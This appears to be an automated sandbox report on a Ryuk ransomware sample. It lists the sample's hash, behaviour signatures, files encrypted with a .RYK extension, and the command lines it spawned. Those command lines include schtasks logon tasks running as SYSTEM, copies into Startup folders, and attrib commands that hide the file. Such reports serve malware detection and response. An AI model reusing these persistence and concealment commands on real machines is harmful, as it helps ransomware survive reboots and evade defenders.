Malware Analysis Report

2024-08-06 09:28

Sample ID: 220921-zbzzrscfcl
Target: ryuk.exe
SHA256: 5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae
Tags: ryuk, discovery, evasion, ransomware
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256: 5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae

Threat Level: Known bad

The file ryuk.exe was found to be: Known bad.

Malicious Activity Summary

ryuk discovery evasion ransomware

Ryuk

Disables Task Manager via registry modification

Modifies file permissions

Drops startup file

Enumerates connected drives

Drops file in Program Files directory

Enumerates physical storage devices

Creates scheduled task(s)

Views/modifies file attributes

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Kills process with taskkill

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK Matrix V6

Analysis: static1

Detonation Overview

Reported: 2022-09-21 20:33

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2022-09-21 20:33

Reported: 2022-09-21 20:36

Platform: win10v2004-20220812-en

Max time kernel: 112s

Max time network: 124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ryuk.exe"

Signatures

Ryuk

ransomware ryuk

Disables Task Manager via registry modification

evasion

Drops startup file

Description | Indicator | Process | Target
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe | C:\Windows\system32\cmd.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe | C:\Windows\system32\cmd.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe | C:\Windows\system32\attrib.exe | N/A

Modifies file permissions

discovery
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\icacls.exe | N/A

Enumerates connected drives

Description | Indicator | Process | Target
File opened (read-only) | \??\W: | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened (read-only) | \??\M: | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened (read-only) | \??\N: | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened (read-only) | \??\Q: | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened (read-only) | \??\R: | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened (read-only) | \??\O: | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened (read-only) | \??\S: | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened (read-only) | \??\U: | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened (read-only) | \??\V: | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened (read-only) | \??\E: | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened (read-only) | \??\K: | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened (read-only) | \??\A: | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened (read-only) | \??\T: | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened (read-only) | \??\X: | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened (read-only) | \??\Y: | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened (read-only) | \??\Z: | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened (read-only) | \??\H: | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened (read-only) | \??\L: | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened (read-only) | \??\B: | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened (read-only) | \??\P: | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened (read-only) | \??\G: | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened (read-only) | \??\I: | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened (read-only) | \??\J: | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Standard2019R_Retail-ul-oob.xrm-ms.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.scale-140.png.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Retail-ul-phn.xrm-ms.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\WINWORD.VisualElementsManifest.xml.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Templates\1033\ApothecaryLetter.dotx.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\da-dk\ui-strings.js.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\cloud_secured.png.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-sl\ui-strings.js.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-swing-tabcontrol.xml.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_zh_CN.jar.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_OEM_Perp-ul-phn.xrm-ms.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\mobile_equalizer.html.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\css\main-selector.css.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\toc.xml.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\GRLEX.DLL.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\vlc.mo.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-black_scale-140.png.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\ADALPREVIOUS.DLL.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.sat4j.pb_2.3.5.v201404071733.jar.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-favorites.xml_hidden.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest3-ppd.xrm-ms.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Trial2-ppd.xrm-ms.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_zh_4.4.0.v20140623020002.jar.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial3-ppd.xrm-ms.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN105.XML.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\dark\adc_logo.png.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\km.pak.DATA.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\about.html.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\ClientARMRefer2019_eula.txt.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\help.svg.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql_2.0.100.v20131211-1531.jar.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ppd.xrm-ms.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.scale-100.png.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\rhp_world_icon_2x.png.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-api.xml.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_Retail-ppd.xrm-ms.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\GRPHFLT\MS.WPG.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_int_2x.gif.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ui-strings.js.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jmx.xml.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\DocumentRepository.ico.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-ja_jp.gif.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\mr.pak.DATA.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_Retail-ul-phn.xrm-ms.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.scale-100.png.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected].[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\selector.js.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-fr\ui-strings.js.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sv-se\ui-strings.js.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Grace-ul-oob.xrm-ms.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019R_OEM_Perp-ppd.xrm-ms.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ADDINS\Power Map Excel Add-in\VISUALIZATIONDIRECTX.DLL.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hu-hu\ui-strings.js.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon_2x.png.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-fr\ui-strings.js.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\de_get.svg.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\ga.pak.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\locale\com-sun-tools-visualvm-modules-startup_ja.jar.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PROOF\MSSP7EN.dub.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\URLREDIR.DLL.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
File opened for modification | C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\vlc.mo.[[email protected]].RYK | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A

Kills process with taskkill

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | N/A
(the row above is recorded 64 times, one per process-enumeration event)

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 4824 wrote to memory of 3064 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 3064 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 3064 wrote to memory of 3600 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\schtasks.exe
PID 3064 wrote to memory of 3600 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\schtasks.exe
PID 4824 wrote to memory of 5032 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 5032 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 1732 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 1732 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 4112 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 4112 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 4112 wrote to memory of 4192 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\schtasks.exe
PID 4112 wrote to memory of 4192 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\schtasks.exe
PID 4824 wrote to memory of 1672 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 1672 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 1672 wrote to memory of 1128 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\attrib.exe
PID 1672 wrote to memory of 1128 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\attrib.exe
PID 4824 wrote to memory of 3596 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 3596 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 3596 wrote to memory of 4528 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\schtasks.exe
PID 3596 wrote to memory of 4528 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\schtasks.exe
PID 4824 wrote to memory of 628 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 628 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 628 wrote to memory of 3568 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\schtasks.exe
PID 628 wrote to memory of 3568 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\schtasks.exe
PID 4824 wrote to memory of 1148 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 1148 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 1148 wrote to memory of 2372 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\attrib.exe
PID 1148 wrote to memory of 2372 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\attrib.exe
PID 4824 wrote to memory of 2768 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 2768 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 2768 wrote to memory of 2324 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\attrib.exe
PID 2768 wrote to memory of 2324 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\attrib.exe
PID 4824 wrote to memory of 2764 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 2764 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 4532 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 4532 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 4352 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 4352 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 4532 wrote to memory of 1472 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 4532 wrote to memory of 1472 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 4824 wrote to memory of 228 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 228 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 228 wrote to memory of 1556 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 228 wrote to memory of 1556 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 228 wrote to memory of 3884 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\taskkill.exe
PID 228 wrote to memory of 3884 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\taskkill.exe
PID 4824 wrote to memory of 3080 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 3080 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 1124 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 1124 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 4352 wrote to memory of 388 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\icacls.exe
PID 4352 wrote to memory of 388 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\icacls.exe
PID 4824 wrote to memory of 5112 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 5112 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 968 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\taskkill.exe
PID 1556 wrote to memory of 968 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\taskkill.exe
PID 4824 wrote to memory of 4804 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 4804 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 5060 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 5060 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 2896 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 4824 wrote to memory of 2896 | N/A | C:\Users\Admin\AppData\Local\Temp\ryuk.exe | C:\Windows\system32\cmd.exe
PID 2896 wrote to memory of 4564 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2896 wrote to memory of 4564 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe

Views/modifies file attributes

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\attrib.exe | N/A
N/A | N/A | C:\Windows\system32\attrib.exe | N/A
N/A | N/A | C:\Windows\system32\attrib.exe | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ryuk.exe

"C:\Users\Admin\AppData\Local\Temp\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ryuk.exe" /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe

C:\Windows\system32\attrib.exe

